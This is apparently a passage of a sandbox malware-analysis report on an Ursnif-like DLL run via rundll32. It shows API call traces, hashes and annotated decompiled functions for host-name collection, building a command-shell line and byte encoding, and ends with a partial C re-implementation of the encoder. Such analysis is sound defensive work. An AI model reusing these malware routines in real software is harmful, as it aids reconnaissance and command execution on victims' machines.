                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$Free$Alloc
                                            • String ID:
                                            • API String ID: 986138563-0
                                            • Opcode ID: b3e9b4e6e753b7be91aa489eb9656657089a6abc1ffcdc6c3102deea423a0d80
                                            • Instruction ID: ac63bf3c435c2a9bb00508adffdba06a6ec495d9440c7ba824d5119295f4bc9b
                                            • Opcode Fuzzy Hash: b3e9b4e6e753b7be91aa489eb9656657089a6abc1ffcdc6c3102deea423a0d80
                                            • Instruction Fuzzy Hash: E2311971500219AFCB11DF54CC88C9BBB79FFC97407248668F9159B210E632ED62DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 50%
                                            			E049F6615(intOrPtr* __eax, intOrPtr _a4) {
                                            				void* _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				intOrPtr* _t22;
                                            				void* _t23;
                                            				intOrPtr* _t24;
                                            				intOrPtr* _t26;
                                            				intOrPtr* _t28;
                                            				intOrPtr* _t30;
                                            				void* _t31;
                                            				intOrPtr* _t32;
                                            				intOrPtr _t42;
                                            				intOrPtr _t45;
                                            				intOrPtr _t48;
                                            				void* _t51;
                                            
                                            				_push( &_v16);
                                            				_t42 =  *0x49fa348; // 0x57d5a8
                                            				_t2 = _t42 + 0x49fb470; // 0x20400
                                            				_push(0);
                                            				_push(__eax);
                                            				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                            				if(_t51 >= 0) {
                                            					_t22 = _v16;
                                            					_t45 =  *0x49fa348; // 0x57d5a8
                                            					_t6 = _t45 + 0x49fb490; // 0xe7a1af80
                                            					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                            					_t51 = _t23;
                                            					if(_t51 >= 0) {
                                            						_t26 = _v12;
                                            						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                            						if(_t51 >= 0) {
                                            							_t48 =  *0x49fa348; // 0x57d5a8
                                            							_t30 = _v8;
                                            							_t12 = _t48 + 0x49fb480; // 0xa4c6892c
                                            							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                            							_t51 = _t31;
                                            							_t32 = _v8;
                                            							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                            						}
                                            						_t28 = _v12;
                                            						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                            					}
                                            					_t24 = _v16;
                                            					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                            				}
                                            				return _t51;
                                            			}

                                            APIs
                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049F6652
                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049F6683
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Interface_ProxyQueryUnknown_
                                            • String ID:
                                            • API String ID: 2522245112-0
                                            • Opcode ID: e2c30c2951b955e75706720a8aa0d44f7ff0f74d631ecfbc3f3d7012916288a0
                                            • Instruction ID: 35f57b82fe10acde0c2ab9c94dc06a67c1a1c3046755667661af5340e735bbd6
                                            • Opcode Fuzzy Hash: e2c30c2951b955e75706720a8aa0d44f7ff0f74d631ecfbc3f3d7012916288a0
                                            • Instruction Fuzzy Hash: 9921F9B5A00619AFCB00DFA4C888D5AB779FFC9B14B148698ED05DB324D671FE41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000,?), ref: 05821BEA
                                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000), ref: 05821C31
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                            • String ID:
                                            • API String ID: 552344955-0
                                            • Opcode ID: 5cdc1c1f0fda3e8af095769c47b5460cd2338ce6ccc4f82b3f37590d441e13e8
                                            • Instruction ID: a8610edc59da71517f242b7338a610f8c209a276ea54dd82955db019e40edc1d
                                            • Opcode Fuzzy Hash: 5cdc1c1f0fda3e8af095769c47b5460cd2338ce6ccc4f82b3f37590d441e13e8
                                            • Instruction Fuzzy Hash: 06117075A00218ABCB119BA8C888B9EFFBDFF80795F204059EC05D7240DB74DE81CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,05813344,69B25F44,?,?,00000000), ref: 05817C5B
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,05813344), ref: 05817CBC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$FileFreeHeapSystem
                                            • String ID:
                                            • API String ID: 892271797-0
                                            • Opcode ID: 58a3e343a38cd2288f84469088047d8636a091f9c748dcd9f89996acd89113f5
                                            • Instruction ID: f998c117509eff816be94872a85b7330c6cad883beccdb2f906c2538e70c1877
                                            • Opcode Fuzzy Hash: 58a3e343a38cd2288f84469088047d8636a091f9c748dcd9f89996acd89113f5
                                            • Instruction Fuzzy Hash: 5711F8B6910208FBDF10EBE4D949ADE7BBDEB08215F104196FD02E2150DB34AA84CB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 049F290B
                                              • Part of subcall function 049F69D2: SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 049F295B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyFreeString
                                            • String ID:
                                            • API String ID: 3098518882-0
                                            • Opcode ID: 678d495a1e5a22f394bc6c2b90968d548476367caa03620df863afb51d31782e
                                            • Instruction ID: ab7cd0e93aa2abb50a496023e7918ddda3e776e795de4e21168bb8cf2127d537
                                            • Opcode Fuzzy Hash: 678d495a1e5a22f394bc6c2b90968d548476367caa03620df863afb51d31782e
                                            • Instruction Fuzzy Hash: 0D113071A00209BFDB019FA4DC04EEEBBB9EF44750F008075EA04A7160E675AA558B91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SysAllocString.OLEAUT32(049F744C), ref: 049F7900
                                              • Part of subcall function 049F69D2: SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F7941
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$Free$Alloc
                                            • String ID:
                                            • API String ID: 986138563-0
                                            • Opcode ID: 8b1304def2b748a7c6bebe1e710be1dfcbdb7da12323bc5d2d652d00350ca35c
                                            • Instruction ID: 04dc0b3ae3f7fdca81c3e5d38cb3130a80dab9b0e00fe7fe2e4334ced700d24d
                                            • Opcode Fuzzy Hash: 8b1304def2b748a7c6bebe1e710be1dfcbdb7da12323bc5d2d652d00350ca35c
                                            • Instruction Fuzzy Hash: DE01627550111ABFDF019FA9D804D9F7BB9EF48710B144032FA08E7120E670AD15CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                             			E049F1567(void* __ecx) {
                                             				signed int _v8;
                                             				void* _t15;
                                             				void* _t19;
                                             				void* _t20;
                                             				void* _t22;
                                             				intOrPtr* _t23;
                                             
                                             				_t23 = __imp__; // import slot; resolved as GetComputerNameExA in the APIs list below
                                             				_t20 = 0;
                                             				_v8 = _v8 & 0; // size = 0: the first call only queries the required length
                                             				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed; NameType 3 = ComputerNameDnsFullyQualified, NULL buffer
                                             				_t10 = _v8;
                                             				if(_v8 != 0) {
                                             					_t20 = E049F4DF6(_t10 + 1); // heap-allocate length + 1 (RtlAllocateHeap wrapper, see APIs)
                                             					if(_t20 != 0) {
                                             						_t15 =  *_t23(3, _t20,  &_v8); // executed; second call fills the buffer with the host's FQDN
                                             						if(_t15 != 0) {
                                             							 *((char*)(_v8 + _t20)) = 0; // explicit NUL terminator
                                             						} else {
                                             							E049F4C73(_t20); // RtlFreeHeap wrapper, see APIs
                                             							_t20 = 0;
                                             						}
                                             					}
                                             				}
                                             				return _t20; // heap string holding the FQDN, or NULL on failure
                                             			}

                                            APIs
                                            • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,049F641B), ref: 049F157F
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,049F641B), ref: 049F159C
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ComputerHeapName$AllocateFree
                                            • String ID:
                                            • API String ID: 187446995-0
                                            • Opcode ID: f9b0934fbe02d15cd0894842a97f3463180c69b3449d80418436aa37120cecbd
                                            • Instruction ID: 2f71ef376834b8da1fb806e6d73c2a1cb425b69605b7a615bfe8516cd72a757d
                                            • Opcode Fuzzy Hash: f9b0934fbe02d15cd0894842a97f3463180c69b3449d80418436aa37120cecbd
                                            • Instruction Fuzzy Hash: C5F05466A00105FBEB11D6998D01FAF76EDDBC5750F150175EA05E3141EA70FE0197B0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                             			E049F75C6(WCHAR* _a4) {
                                             				void* __edi;
                                             				intOrPtr _t11;
                                             				intOrPtr _t14;
                                             				void* _t16;
                                             				void* _t18;
                                             				WCHAR* _t20;
                                             
                                             				_t20 = E049F4DF6(lstrlenW(_a4) + _t7 + 0x5c); // heap-allocate room for the formatted string (_t7 is a register term the decompiler left unresolved)
                                             				if(_t20 == 0) {
                                             					_t18 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                             				} else {
                                             					_t11 =  *0x49fa348; // 0x57d5a8, value added to the embedded string addresses
                                             					_t5 = _t11 + 0x49fba48; // 0x43002f: the first two UTF-16LE characters are '/' 'C'
                                             					wsprintfW(_t20, _t5, 5, _a4); // format the integer 5 and the caller's string into that template
                                             					_t14 =  *0x49fa348; // 0x57d5a8
                                             					_t6 = _t14 + 0x49fb8f8; // 0x6d0063: the first two UTF-16LE characters are 'c' 'm'
                                             					_t16 = E049F3E6C(0, _t6, _t20, 0); // executed; program-name string plus the built command line (subcall uses memset/GetLastError, see APIs); a "/C" template and a "cm..." program name are consistent with a cmd.exe /C command line
                                             					_t18 = _t16;
                                             					E049F4C73(_t20); // free the buffer
                                             				}
                                             				return _t18;
                                             			}

                                            APIs
                                            • lstrlenW.KERNEL32(76CDF710,00000000,?,049F2AC0,00000000,?,76CDF710,00000000,76CDF730), ref: 049F75CC
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • wsprintfW.USER32 ref: 049F75F5
                                              • Part of subcall function 049F3E6C: memset.NTDLL ref: 049F3E8F
                                              • Part of subcall function 049F3E6C: GetLastError.KERNEL32 ref: 049F3EDB
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                            • String ID:
                                            • API String ID: 1672627171-0
                                            • Opcode ID: ee2d19f9c93585ca3264561d5c9f6e9b4db90211f3c7b16be048fb86d761ec8e
                                            • Instruction ID: 8f58496660283ba44f7283fc63b9655f7af8105db47b6c61a6d158ab6cdfbf89
                                            • Opcode Fuzzy Hash: ee2d19f9c93585ca3264561d5c9f6e9b4db90211f3c7b16be048fb86d761ec8e
                                            • Instruction Fuzzy Hash: 1AF0BE32204210ABDB10AB58EC08F9B3B9DDFC4724F168472FB04C7221DA78F8518765
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 05809A62
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 05809A9E
                                              • Part of subcall function 0581E376: lstrlen.KERNEL32(?,?,?,?,00000000,?,058017D3,?), ref: 0581E3C4
                                              • Part of subcall function 0581E376: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3D6
                                              • Part of subcall function 0581E376: lstrcpy.KERNEL32(00000000,?), ref: 0581E3E5
                                              • Part of subcall function 0581E376: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3F6
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 1872894792-0
                                            • Opcode ID: 967a529fcf478c7f5053e6e0074f5c2fb11a24b5b738190d3b72166c24bc2af1
                                            • Instruction ID: 60f6a95a6d9d0373584b85066bdf1593fbd6361abf78aa89772c712d61b5ea35
                                            • Opcode Fuzzy Hash: 967a529fcf478c7f5053e6e0074f5c2fb11a24b5b738190d3b72166c24bc2af1
                                            • Instruction Fuzzy Hash: 5BF0A076B022259B86706F5C9C898B9FFACFB89124302816BED16D3351DA726CC0C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • InterlockedIncrement.KERNEL32(0582907C), ref: 0581F94B
                                              • Part of subcall function 05815CA1: GetSystemTimeAsFileTime.KERNEL32(?), ref: 05815CCC
                                              • Part of subcall function 05815CA1: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05815CD9
                                              • Part of subcall function 05815CA1: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05815D65
                                              • Part of subcall function 05815CA1: GetModuleHandleA.KERNEL32(00000000), ref: 05815D70
                                              • Part of subcall function 05815CA1: RtlImageNtHeader.NTDLL(00000000), ref: 05815D79
                                              • Part of subcall function 05815CA1: RtlExitUserThread.NTDLL(00000000), ref: 05815D8E
                                            • InterlockedDecrement.KERNEL32(0582907C), ref: 0581F96F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                            • String ID:
                                            • API String ID: 1011034841-0
                                            • Opcode ID: d0fa929da4b42fd824da063f17feb25c4409a7723fbd87b821377e61b63ef5f0
                                            • Instruction ID: 54070fa140aefd09c52038dd86f2c1cd528b4561e59753a7d4e10c07603dd8ef
                                            • Opcode Fuzzy Hash: d0fa929da4b42fd824da063f17feb25c4409a7723fbd87b821377e61b63ef5f0
                                            • Instruction Fuzzy Hash: C0E01231348335B7DB217BF4A908B6A6F5ABB44A50F004614FE87D0150E720CC91DBBA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                             			E049F3D23(signed int __edx, intOrPtr _a4) {
                                             				void* _t3;
                                             				void* _t5;
                                             				void* _t7;
                                             				void* _t8;
                                             				void* _t9;
                                             				signed int _t10;
                                             
                                             				_t10 = __edx;
                                             				_t3 = HeapCreate(0, 0x400000, 0); // executed; private growable heap, 4 MiB initial size
                                             				 *0x49fa2d8 = _t3; // heap handle reused by the other routines (e.g. RtlAllocateHeap in E049F215A)
                                             				if(_t3 == 0) {
                                             					_t8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                             					return _t8;
                                             				}
                                             				 *0x49fa1c8 = GetTickCount(); // start tick count
                                             				_t5 = E049F515F(_a4); // initialisation steps run in order; each returns 0 on success
                                             				if(_t5 == 0) {
                                             					_t5 = E049F39B5(_t9, _a4); // executed
                                             					if(_t5 == 0) {
                                             						if(E049F6729(_t9) != 0) {
                                             							 *0x49fa300 = 1; // executed; global flag set when E049F6729 succeeds
                                             						}
                                             						_t7 = E049F2C52(_t10); // executed
                                             						return _t7;
                                             					}
                                             				}
                                             				return _t5;
                                             			}

                                            APIs
                                            • HeapCreate.KERNEL32(00000000,00400000,00000000,049F3DA8,?), ref: 049F3D2C
                                            • GetTickCount.KERNEL32 ref: 049F3D40
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CountCreateHeapTick
                                            • String ID:
                                            • API String ID: 2177101570-0
                                            • Opcode ID: 827609058439c2409fc85b929f25f6fd88726df0bfd70b8d95b0a11112476953
                                            • Instruction ID: 33ce379a4b6343f815d92ffb4dba2b4db1410239e14141acc6606297e9128af8
                                            • Opcode Fuzzy Hash: 827609058439c2409fc85b929f25f6fd88726df0bfd70b8d95b0a11112476953
                                            • Instruction Fuzzy Hash: E2F01AB0388702AAEB302F71AD05B197E98AF84748F208535EF4AD4191EB7DF8409B25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05813D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813DC1
                                              • Part of subcall function 05813D88: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05813DF7
                                              • Part of subcall function 05813D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813E03
                                              • Part of subcall function 05813D88: lstrcmpi.KERNEL32(?,00000000), ref: 05813E40
                                              • Part of subcall function 05813D88: StrChrA.SHLWAPI(?,0000002E), ref: 05813E49
                                              • Part of subcall function 05813D88: lstrcmpi.KERNEL32(?,00000000), ref: 05813E5B
                                              • Part of subcall function 05813D88: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05813EAC
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,058250E8,0000002C,0580B707,05D78E36,?,00000000,0580A3F0), ref: 058147ED
                                              • Part of subcall function 05801C78: GetProcAddress.KERNEL32(?), ref: 05801CA1
                                              • Part of subcall function 05801C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 05801CC3
                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,058250E8,0000002C,0580B707,05D78E36,?,00000000,0580A3F0,?,00000318), ref: 05814878
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                            • String ID:
                                            • API String ID: 4138075514-0
                                            • Opcode ID: 86fdebf59ecc991346d3d81985c4817804d8dbcb1ead0d2018c1d6cb5caf133f
                                            • Instruction ID: 9965e05daae7e6ef72641a92c6ca3c31bf45d8b8b3abb846c792e49a8a1010e3
                                            • Opcode Fuzzy Hash: 86fdebf59ecc991346d3d81985c4817804d8dbcb1ead0d2018c1d6cb5caf133f
                                            • Instruction Fuzzy Hash: 5321D471E01228ABCF519FA5DC459DEBFB5FF08720F10812AED14A6150C7349A41CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000001,00000000,76C84D40,?,?,00000000,05813333,?,?,?,?,?,?,?,0580BF69), ref: 0581CB65
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 23de3a193efec0ddd803049dfb8bbf8c2551ece312945db402ac3d9ee6134f4f
                                            • Instruction ID: 599419f03ecef41e85ce1935dfe121487943be6459eaa6b349f4b472375fc53b
                                            • Opcode Fuzzy Hash: 23de3a193efec0ddd803049dfb8bbf8c2551ece312945db402ac3d9ee6134f4f
                                            • Instruction Fuzzy Hash: 5A3190B1A40218EFDF50DF99D985DADBBB9FB44224F50806AEE01EB200C730AD81CF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                             			E049F215A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                             				signed int _v5;
                                             				signed int _v12;
                                             				void* _t32;
                                             				signed int _t37;
                                             				signed int _t39;
                                             				signed char _t45;
                                             				void* _t49;
                                             				char* _t51;
                                             				signed int _t65;
                                             				signed int _t66;
                                             				signed int _t69;
                                             
                                             				_v12 = _v12 & 0x00000000; // result code, 0 = success
                                             				_t69 = __eax; // number of input bytes, passed in EAX
                                             				_t32 = RtlAllocateHeap( *0x49fa2d8, 0, __eax << 2); // executed; 4 output bytes per input byte (up to 3 digits plus separator) from the heap created in E049F3D23
                                             				_t49 = _t32;
                                             				if(_t49 == 0) {
                                             					_v12 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                             				} else {
                                             					 *_a8 = _t49; // output string
                                             					do {
                                             						_t45 =  *_a4; // next input byte
                                             						asm("cdq");
                                             						_t65 = 0x64;
                                             						_t37 = (_t45 & 0x000000ff) / _t65; // hundreds digit
                                             						_v5 = _t37;
                                             						if(_t37 != 0) {
                                             							 *_t49 = _t37 + 0x30; // emit it as ASCII
                                             							_t49 = _t49 + 1;
                                             							_t45 = _t45 + _t37 * 0x9c; // subtract digit * 100 (0x9c == -100 in 8 bits)
                                             						}
                                             						asm("cdq");
                                             						_t66 = 0xa;
                                             						_t39 = (_t45 & 0x000000ff) / _t66; // tens digit
                                             						if(_t39 != 0 || _v5 != _t39) { // emit it when nonzero, or when a hundreds digit was emitted
                                             							 *_t49 = _t39 + 0x30;
                                             							_t49 = _t49 + 1;
                                             							_t45 = _t45 + _t39 * 0xf6; // subtract digit * 10 (0xf6 == -10 in 8 bits)
                                             						}
                                             						_a4 = _a4 + 1;
                                             						 *_t49 = _t45 + 0x30; // units digit
                                             						 *(_t49 + 1) = 0x2c; // ',' separator
                                             						_t49 = _t49 + 2;
                                             						_t69 = _t69 - 1;
                                             					} while (_t69 != 0); // do/while: a zero count would underflow the counter
                                             					_t51 = _t49 - 1; // points at the trailing comma
                                             					 *_a12 = _t51 -  *_a8; // output length, without terminator
                                             					 *_t51 = 0; // trailing comma becomes the NUL terminator
                                             				}
                                             				return _v12;
                                             			}
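The routine above turns a byte array into a comma-separated list of decimal values with no leading zeros, sized at exactly four output bytes per input byte. The following is an added example, written for this page and not code from the Joe Sandbox report or from the Ursnif sample: a portable C re-implementation of that encoder, a strict decoder for the same text form, and a self-check. All function names are mine, the input bytes are constructed for the demonstration, and the only deliberate departure from the decompiled logic is an explicit guard for a zero-length input, which the sample's do/while loop does not handle.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Encoder mirroring E049F215A. Returns 0 on success or 8 (ERROR_NOT_ENOUGH_MEMORY,
 * the Win32 code the sample returns) if allocation fails. On success *out is a
 * malloc'd NUL-terminated string "d,d,...,d" and *out_len its length. */
int encode_bytes_as_decimal_list(const unsigned char *in, size_t n,
                                 char **out, size_t *out_len)
{
    /* Same sizing as the sample (count << 2): at most three digits plus one
     * separator per byte; the separator slot of the last byte holds the NUL. */
    char *buf = malloc(n ? n * 4 : 1);
    char *p = buf;
    size_t i;

    if (buf == NULL)
        return 8;
    for (i = 0; i < n; i++) {
        unsigned v = in[i];
        unsigned h = v / 100, t = (v / 10) % 10, u = v % 10;
        if (h)
            *p++ = (char)('0' + h);
        /* The tens digit is written when it is nonzero or when a hundreds
         * digit precedes it; this is the sample's "_t39 != 0 || _v5 != _t39". */
        if (h || t)
            *p++ = (char)('0' + t);
        *p++ = (char)('0' + u);
        *p++ = ',';
    }
    /* The sample's do/while guarantees a trailing ','; with n == 0 there is
     * none, so only back up onto it when something was written. */
    if (n)
        p--;
    *p = '\0';
    *out = buf;
    *out_len = (size_t)(p - buf);
    return 0;
}

/* Strict inverse: parses "d,d,d" back into bytes. Returns the byte count, or -1
 * on anything the encoder never produces (empty field, leading zero, non-digit,
 * value above 255). out may be NULL to validate and count only. */
long decode_decimal_list(const char *s, unsigned char *out, size_t cap)
{
    long count = 0;
    for (;;) {
        unsigned v = 0;
        int digits = 0;
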